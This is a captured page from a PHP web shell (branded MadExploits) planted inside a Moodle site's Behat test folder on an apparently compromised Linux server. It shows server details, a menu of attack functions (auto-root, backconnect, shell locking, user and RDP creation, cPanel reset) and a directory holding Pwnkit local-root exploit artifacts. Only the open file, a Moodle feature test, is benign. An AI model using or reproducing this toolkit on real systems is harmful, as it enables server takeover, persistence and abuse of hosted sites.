Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.59.42
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
contentbank /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
access_permissions.feature
1.07
KB
-rw-r--r--
delete_content.feature
3.51
KB
-rw-r--r--
download_content.feature
3.21
KB
-rw-r--r--
edit_content.feature
9.98
KB
-rw-r--r--
events.feature
3.24
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
search_content.feature
2.7
KB
-rw-r--r--
sort_content.feature
2.95
KB
-rw-r--r--
view_preferences.feature
1.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : access_permissions.feature
@core @core_contentbank Feature: Access permission to content Bank In order to control access to content bank As an admin I need to be able to configure users' permissions Background: Given the following "users" exist: | username | firstname | lastname | email | | teacher1 | Teacher | 1 | user1@example.com | And the following "courses" exist: | fullname | shortname | category | | Course 1 | C1 | 0 | And the following "course enrolments" exist: | user | course | role | | teacher1 | C1 | editingteacher | Scenario: Admins access content bank Given I log in as "admin" Then "Content bank" "link" should exist Scenario: Editing teachers can access content bank at course level Given I log in as "teacher1" And I am on "Course 1" course homepage with editing mode on Then "Content bank" "link" should exist Scenario: Editing teachers can't access content bank at system level Given I log in as "teacher1" Then "Content bank" "link" should not exist
Close